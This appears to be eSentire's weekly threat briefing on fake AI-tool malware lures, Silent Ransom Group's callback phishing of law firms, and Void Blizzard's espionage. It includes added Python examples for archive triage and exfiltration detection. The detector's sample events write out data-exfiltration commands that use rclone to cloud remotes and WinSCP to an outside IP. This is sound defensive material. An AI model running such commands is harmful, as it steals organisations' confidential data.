Threat Briefing — May 30, 2025

Weekly Threat Briefing - May 26 - May 30

TLP: CLEAR - This information may be shared publicly

eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.

Noteworthy News

Cybercriminals Employ AI Lure to Distribute Malware

Bottom Line: Recent reports describe a surge in malware distribution campaigns that use fake AI tool installers and fake AI websites as lures. The payloads include ransomware, information stealers, remote access trojans (RATs), and backdoors.

On May 20th Check Point, and on May 27th Google Cloud, reported that threat actors have been using fake Artificial Intelligence (AI) themed websites to drop malware on victim devices. The websites impersonate legitimate AI video generation platforms that offer text-to-video or image-to-video features, such as Luma AI, Canva Dream Lab, and Kling AI.

According to Check Point, the attackers cloned the Kling AI website and drove traffic to the malicious page through Facebook malvertising. Interacting with the fake site served a malicious ZIP archive containing a .NET loader, which deployed the second-stage payload, the PureHVNC Remote Access Trojan (RAT). The activity targeted victims globally, with the greatest impact observed in Asia.

Google Cloud reported similar malware distribution activity, which it tracks as UNC6032. The threat actors used malicious advertisements on Facebook and LinkedIn to lure victims to fake AI video generator websites. Once a user submits a video prompt, the fake site delivers a static payload from its own or related infrastructure, regardless of the input. On the site impersonating Luma AI, the download was a ZIP archive containing the STARKVEIL dropper, which in turn deployed the XWORM and FROSTRIFT backdoors and the GRIMPULL downloader. UNC6032 has been active since at least mid-2024, is believed to be operated from Vietnam, and has affected victims across the United States, Europe, and Australia.

On May 29th, Cisco Talos reported on threat actors using fake AI tool installers to distribute malware, including the CyberLock and Lucky_Gh0$t ransomware families and a newly identified malware dubbed Numero. The threat actors used SEO poisoning to surface these installer packages in search results and promoted them on social media platforms such as Telegram. CyberLock, a PowerShell-based ransomware, was distributed via a fraudulent AI website imitating the Nova Leads domain; the fake product download was a ZIP archive containing a .NET loader with the CyberLock PowerShell script embedded in it. Lucky_Gh0$t ransomware was distributed as a fake ChatGPT installer packaged as a self-extracting (SFX) archive built to evade detection; running the installer resulted in a ransomware infection. Cisco Talos also identified a new malware, tracked as Numero, delivered as a fake installer for the InVideo AI video generator. The installer consisted of a Windows batch file, a VBScript, and the Numero executable. Numero manipulates the Windows desktop and runs in a continuous loop with fixed pauses between executions, effectively rendering the victim's system unusable.
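A quick pre-execution check for the kind of archive these campaigns deliver, added here as an example (it is not code from the Check Point, Google Cloud or Cisco Talos reports): list the members of a downloaded ZIP and flag anything an AI video generator installer has no reason to contain, such as executables, batch or VBScript stagers, media-looking double extensions, PE content stored under a data extension, and an archive that is itself a PE (a self-extracting installer). The sample archive is constructed in memory and the extension lists are illustrative choices, not taken from the reports.

```python
"""Added example: pre-execution triage of a downloaded "AI tool" ZIP archive.
Not code from the Check Point, Google Cloud or Cisco Talos reports; the sample
archive is constructed in memory and the extension lists are illustrative."""
import io
import zipfile
from pathlib import PurePosixPath

EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".com", ".msi"}
SCRIPT_EXTS = {".bat", ".cmd", ".vbs", ".js", ".ps1", ".lnk", ".hta"}
MEDIA_EXTS = {".mp4", ".mov", ".png", ".jpg", ".jpeg", ".gif"}


def triage_archive(data: bytes) -> list:
    """Return human-readable findings for an archive; an empty list means the
    archive holds nothing that should alarm a user who expected media tooling."""
    findings = []
    # A self-extracting archive is a PE executable with the ZIP appended: it
    # runs code on double-click, although archive tools still open it as a ZIP.
    if data[:2] == b"MZ":
        findings.append("self-extracting archive: PE header precedes the ZIP data")
    if not zipfile.is_zipfile(io.BytesIO(data)):
        findings.append("not a ZIP archive")
        return findings
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            suffixes = [s.lower() for s in PurePosixPath(info.filename.replace("\\", "/")).suffixes]
            ext = suffixes[-1] if suffixes else ""
            if ext in EXECUTABLE_EXTS:
                findings.append(f"{info.filename}: executable")
            elif ext in SCRIPT_EXTS:
                findings.append(f"{info.filename}: script or shortcut")
            # "Generated_Video.mp4.exe" reads as a video when Explorer hides extensions
            if len(suffixes) >= 2 and suffixes[-2] in MEDIA_EXTS and ext in EXECUTABLE_EXTS | SCRIPT_EXTS:
                findings.append(f"{info.filename}: media name masking an executable extension")
            # Read only the first two bytes of each member: a PE image stored
            # under a harmless-looking extension is a typical second-stage payload.
            with zf.open(info) as member:
                head = member.read(2)
            if head == b"MZ" and ext not in EXECUTABLE_EXTS:
                findings.append(f"{info.filename}: PE content under a non-executable extension")
    return findings


def build_sample(sfx: bool) -> bytes:
    """Constructed archive mimicking the fake installers described above:
    a PE loader with a video-like double extension, a batch + VBScript stager,
    a decoy readme, and a PE hidden under a .dat extension. With sfx=True a
    fake PE stub is prepended, as in a self-extracting installer."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AI Video Generator/Generated_Video.mp4.exe", b"MZ" + b"\0" * 64)
        zf.writestr("AI Video Generator/setup.bat", b"@echo off\r\nstart render.vbs\r\n")
        zf.writestr("AI Video Generator/render.vbs", b"' constructed stub, does nothing\r\n")
        zf.writestr("AI Video Generator/readme.txt", b"Thanks for downloading!\r\n")
        zf.writestr("AI Video Generator/config.dat", b"MZ" + b"\0" * 64)
    data = buf.getvalue()
    return (b"MZ" + b"\0" * 254 + data) if sfx else data


if __name__ == "__main__":
    for finding in triage_archive(build_sample(sfx=True)):
        print(finding)
```

The check deliberately never executes or fully extracts anything: it reads the central directory and two bytes per member, which is enough to show that a "video generator" download contains a loader and stagers rather than media. A real deployment would run this on a download gateway or mail sandbox and hand the findings to the user or to EDR, rather than rely on the user noticing a .exe among the files.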

eSentire Threat Intelligence Analysis:

These reports show that as organizations adopt AI, threat actors are exploiting the technology's popularity to improve their malware distribution. The growing use of AI-themed lures is notable but not surprising: threat actors quickly operationalize trending topics and technologies as a means to conduct criminal activity.

Both the Check Point and Google Cloud reports note that the impersonated AI tools offered text-to-video or image-to-video generation. Threat actors exploited the growing interest in Generative AI (GenAI) by serving malicious payloads that were downloaded regardless of the user's input. According to Cisco Talos, the impersonated tools are primarily used in the B2B sales, marketing, and technology sectors to improve product presentations and strengthen market positioning. It is therefore reasonable to conclude that individuals in these fields, people exploring GenAI capabilities, and those working in creative industries are at heightened risk from such campaigns.

These campaigns made extensive use of malicious advertisements on widely used platforms such as Facebook, Telegram, and LinkedIn. The large user base of these networks gives threat actors an ideal environment for publishing deceptive advertisements, broadening the reach and effectiveness of their operations. The use of malvertising to spread malicious AI-themed packages is not new: in August 2023, Trend Micro researchers analyzed LLM/AI-themed malvertising campaigns that delivered information stealers. These social engineering tactics capitalize on the curiosity around AI tools, steering users toward fake promotions posing as legitimate AI resources.

While interest in AI technology is entirely understandable, users must also be aware of the security risks that come with exploring emerging technologies. Organizations should educate employees on safe browsing practices to avoid malicious sites and implement browser-level security controls to support those efforts. To protect assets from malicious downloads, software should be obtained only from trusted sources (checking the installer's publisher signature or published hash where the vendor provides one), and policies should restrict employees to an authorized list of approved software. Alongside these controls, a robust Endpoint Detection and Response (EDR) solution helps identify and contain malware that does reach the network.

The eSentire Threat Intelligence team is consistently tracking these campaigns for new detection opportunities.

FBI Issues Warning on Silent Ransom Group Targeting Law Firms

Bottom Line: The FBI warns that Silent Ransom Group is targeting U.S. law firms through callback phishing attacks, using fake subscription fees as bait to convince victims to install remote access tools, ultimately leading to data theft and extortion demands.

On May 23rd, 2025, the United States Federal Bureau of Investigation (FBI) released an advisory warning organizations of ongoing phishing campaigns conducted by the financially motivated threat actor Silent Ransom Group (aka Luna Moth, Chatty Spider, UNC3753). Silent Ransom Group first emerged in 2022 and is believed to be an offshoot of the Conti ransomware group, which collapsed that same year. The group is known for callback phishing campaigns, in which phishing emails instruct victims to call a provided phone number for "further assistance".

In one campaign reported by the FBI, Silent Ransom Group sends phishing emails impersonating services that offer subscription plans. The emails claim that the victim is being charged a small subscription fee and direct them to call the listed phone number to cancel. When the victim calls, the threat actors provide a URL and instruct them to download Remote Monitoring and Management (RMM) software, granting the threat actor remote access to the victim's device. The actors use this access to establish persistence on the host and locate valuable information, which they exfiltrate and later use for extortion.

In another campaign observed by the FBI, Silent Ransom Group calls users while posing as a member of the organization's IT department, claiming that work needs to be completed on the victim's device overnight. The attack chain again involves having the user download RMM tools, which grant the actors access through a remote session, after which they exfiltrate sensitive data using WinSCP (Windows Secure Copy) or Rclone. In both campaigns, the threat actors then send a ransom email threatening to sell or leak the stolen data if their demands are not met. Silent Ransom Group is also known to call employees at the victim company to pressure the organization into ransom negotiations.
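To show what the exfiltration stage of these intrusions looks like on the endpoint, here is an added example (not code from the FBI advisory or from eSentire) that classifies constructed process-creation events: command-line use of Rclone to copy data to a cloud remote, including the case where the rclone binary has been renamed, and WinSCP driven by its scripting switches. Hostnames, user names, paths and IP addresses are made up, and the event field names are illustrative rather than a specific EDR's schema.

```python
"""Added example: flag process-creation events where the exfiltration utilities
named in the FBI advisory, Rclone and WinSCP, are driven from the command line.
Not code from the advisory or from eSentire; events are constructed and the
field names are illustrative rather than any specific EDR schema."""
import re
import shlex
from pathlib import PureWindowsPath
from typing import Optional

# rclone addresses cloud storage as <remote>:<path> (or an on-the-fly :backend:
# remote). A single letter before the colon is a Windows drive, which rclone
# treats as a local path, so a remote name needs two or more characters.
RCLONE_REMOTE = re.compile(r"^(?::[A-Za-z0-9]+:|[A-Za-z0-9_.-]{2,}:)")
RCLONE_TRANSFER_CMDS = {"copy", "copyto", "sync", "move", "moveto"}
WINSCP_IMAGES = {"winscp.exe", "winscp.com"}


def _tokens(cmdline: str) -> list:
    # posix=False keeps Windows backslashes literal; surrounding quotes are then stripped
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def _is_rclone_transfer(tokens: list) -> bool:
    """True for `<image> <copy|sync|move...> <src> <dst>` where either side is a
    remote. Keyed on syntax, not the binary name, so a renamed rclone is caught."""
    if len(tokens) < 4 or tokens[1].lower() not in RCLONE_TRANSFER_CMDS:
        return False
    positional = [t for t in tokens[2:] if not t.startswith("-")]
    return any(RCLONE_REMOTE.match(t) for t in positional)


def classify(event: dict) -> Optional[str]:
    """Return a finding label for one process-creation event, or None."""
    image = PureWindowsPath(event["image"]).name.lower()
    tokens = _tokens(event["cmdline"])
    if not tokens:
        return None
    if _is_rclone_transfer(tokens):
        if image == "rclone.exe":
            return "rclone transfer to a remote"
        return f"rclone-style transfer from renamed binary {image}"
    if image in WINSCP_IMAGES:
        # /command and /script drive WinSCP non-interactively; a plain GUI launch has neither
        switches = {t.lower().split("=")[0] for t in tokens[1:] if t.startswith("/")}
        if switches & {"/command", "/script"}:
            return "WinSCP scripted transfer"
    return None


def triage(events: list) -> list:
    """(host, user, label) for every event that produced a finding."""
    out = []
    for event in events:
        label = classify(event)
        if label:
            out.append((event["host"], event["user"], label))
    return out


# Constructed events; 198.51.100.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"host": "LAW-WS07", "user": "CORP\\jsmith",
     "image": r"C:\Users\jsmith\AppData\Local\Temp\rclone.exe",
     "cmdline": r'rclone.exe copy "C:\Users\jsmith\Documents\Clients" mega:backup --transfers 8 -P'},
    {"host": "LAW-FS01", "user": "CORP\\svc_backup",
     "image": r"C:\ProgramData\svchost.exe",
     "cmdline": r'svchost.exe sync "D:\Shares\Litigation" gdrive:cases --config C:\ProgramData\r.conf'},
    {"host": "LAW-WS07", "user": "CORP\\jsmith",
     "image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "cmdline": r'"C:\Program Files (x86)\WinSCP\WinSCP.exe" /command "open sftp://upload@198.51.100.20/" "put C:\Users\jsmith\Desktop\export.zip" "exit"'},
    {"host": "LAW-WS12", "user": "CORP\\mlee",
     "image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "cmdline": r'"C:\Program Files (x86)\WinSCP\WinSCP.exe"'},
    {"host": "LAW-WS12", "user": "CORP\\mlee",
     "image": r"C:\Windows\System32\robocopy.exe",
     "cmdline": r'robocopy.exe "C:\Users\mlee\Documents" "\\fileserver\backup\mlee" /MIR'},
]

if __name__ == "__main__":
    for host, user, label in triage(SAMPLE_EVENTS):
        print(f"{host} {user}: {label}")
```

Matching on rclone's command syntax rather than on the file name is the point of the example: actors routinely rename tooling, and `svchost.exe sync ... gdrive:` is far more suspicious than `rclone.exe` itself. The interactive WinSCP launch and the robocopy job to an internal share are left alone, which is the kind of false-positive control a rule like this needs before it goes into production.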

The FBI notes that Silent Ransom Group has consistently targeted law firms based in the United States since spring 2023. The group has targeted other industries as well, including medical and insurance organizations, but most of its victims appear to be law firms. The FBI assesses that this is likely due to the highly sensitive nature of legal data and the resulting willingness of firms to pay a ransom to prevent it from being leaked.

eSentire Threat Intelligence Analysis:

The callback phishing technique is known as BazarCall (aka BazaCall); Trellix notes that it "first came into the limelight in late 2020". BazarCall was used by affiliates of the Conti ransomware group to deploy the BazarLoader backdoor, which in turn led to the deployment of Conti ransomware. As Silent Ransom Group is believed to be an offshoot of Conti, its use of the technique demonstrates continuity with previously established Tactics, Techniques, and Procedures (TTPs).

Silent Ransom Group has dropped the data encryption component of Conti-style attacks and focuses solely on data exfiltration and extortion. Such shifts are not uncommon; a recent example is the Hunters International ransomware group rebranding as World Leaks and moving to extortion-only attacks. The change is likely driven by the slow process of encrypting data and, as Zscaler suggests, by the fact that removing that step eliminates "software development cycles and decryption support".

The abuse of RMM tools is not a novel technique; these tools have been deployed in tech support scams and email bombing campaigns. Threat actors favour legitimate RMM tools for remote access because they blend in with normal business operations and are typically trusted by security controls that would flag custom malware. The resulting foothold is used for follow-on attacks, including the deployment of ransomware. Silent Ransom Group has relied on RMM tools since its emergence, and the FBI published a previous advisory on the group's use of this technique in 2023.

To protect against these attacks, organizations should restrict the use of unapproved RMM tools, allowing only those required for legitimate business operations, and monitor for installation or execution of RMM software outside that allowlist. Organizations should also implement Phishing and Security Awareness Training (PSAT) programs that teach users how to identify and report malicious content, including unsolicited calls that request remote access to their device. eSentire MDR for Endpoint has detections in place for suspicious activity involving RMM tools, and eSentire's Threat Response Unit (TRU) continues to track this topic for additional detection opportunities.

New Russia-Affiliated Actor Void Blizzard Targets Critical Sectors for Espionage

Bottom Line: Microsoft, in coordination with Dutch intelligence agencies, has identified a new Russian state-affiliated threat actor tracked as Void Blizzard. The group targets a range of sectors in NATO member states and Ukraine in support of Russian strategic objectives.

On May 27th, Microsoft released a report on Void Blizzard, also known as LAUNDRY BEAR. This newly identified Russia-affiliated threat actor has been conducting cyberespionage operations since at least April 2024. Microsoft Threat Intelligence assesses with high confidence that this group supports Russian government objectives by targeting entities of strategic interest. Although the group operates globally, it has a strong focus on organizations within NATO member states and Ukraine. The threat actor has primarily focused on organizations operating within the government, defense, telecommunications, transportation, healthcare, education, media, NGOs, intergovernmental organizations, and IT sectors. These attacks have largely affected institutions based in Europe and North America.

Void Blizzard typically gains initial access using low-sophistication but effective methods. The actor frequently acquires stolen credentials from infostealer marketplaces and uses them in password spray attacks against Microsoft Exchange Online and SharePoint Online, gaining access to email systems and beginning data collection. In April 2025, Void Blizzard began employing more targeted techniques, including an Adversary-in-the-Middle (AitM) spear phishing campaign against more than 20 organizations in the NGO sector across Europe and the United States. Victims received emails posing as invitations to the European Defense and Security Summit, with PDF attachments containing malicious QR codes. When scanned, the QR code led to a phishing site built on the Evilginx framework, which proxies the real login page and harvests both the credentials and the resulting session cookies, so the actor can reuse an already-authenticated session rather than log in again.

After obtaining valid credentials or session tokens and gaining access to a victim organization, Void Blizzard abuses legitimate Microsoft cloud APIs such as Exchange Online and Microsoft Graph to enumerate and extract large volumes of data, including user emails, shared mailboxes, and files accessible through cloud storage. In some incidents, the actor accessed Microsoft Teams conversations through the web client to collect additional intelligence. Void Blizzard has also used AzureHound, a publicly available enumeration tool, to map Microsoft Entra ID configurations, including user roles, devices, applications, and group memberships within the victim's environment.

eSentire Threat Intelligence Analysis:

The Netherlands General Intelligence and Security Service (AIVD), the Netherlands Defence Intelligence and Security Service (MIVD), and the US Federal Bureau of Investigation (FBI) collaborated with Microsoft in investigating Void Blizzard activity. Although the group's tools and techniques are not particularly sophisticated, its operations have proven highly effective, demonstrating that basic credential-based attacks can lead to significant compromises. The group used stolen authentication cookies, likely sourced from infostealer malware via criminal marketplaces, to bypass credential-based access controls. This reflects a trend of state-sponsored actors operationalizing criminal infrastructure to facilitate espionage.

Microsoft highlighted that Void Blizzard compromised several user accounts at a Ukrainian aviation organization that had previously been targeted in 2022 by Seashell Blizzard, a Russian General Staff Main Intelligence Directorate (GRU) actor. Many NATO countries, especially in Europe and North America, have provided consistent military, political, and humanitarian support to Ukraine, including weapon systems, intelligence sharing, financial aid, and diplomatic backing. Russia may perceive these supporters as indirect participants in the conflict. By targeting NATO-aligned organizations, Void Blizzard may seek to monitor military aid and defense planning, gain insight into diplomatic and policy decisions, or disrupt strategic collaboration between Ukraine and its allies.

The campaign notably impersonated the European Defense and Security Summit. Masquerading as trusted invitation emails significantly increased the likelihood that the messages would be opened, and with it the success rate of the attack. Even against lures this convincing, user education remains an effective measure. Multi-Factor Authentication (MFA) significantly reduces the value of credentials obtained through password spraying or bought from infostealer markets, since a password alone no longer completes a sign-in. MFA is not an end solution, however: AitM kits such as Evilginx relay the victim's MFA response to the real service and capture the resulting session cookie, so conventional one-time codes and push approvals do not stop this campaign's phishing path. Phishing-resistant methods (FIDO2 security keys or passkeys, certificate-based authentication), Conditional Access policies that require a compliant device, and monitoring for sign-ins and token use from unfamiliar infrastructure, with session revocation on suspicion, are the controls that address stolen session cookies.

In response to the release of this report, the eSentire Threat Intelligence team has performed threat hunts across the client base and is actively monitoring this topic and exploring new detection opportunities.

About the threat briefings:

The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.

eSentire Threat Response Unit (TRU)

Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our Atlas Security Operations Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and cybersecurity acumen.
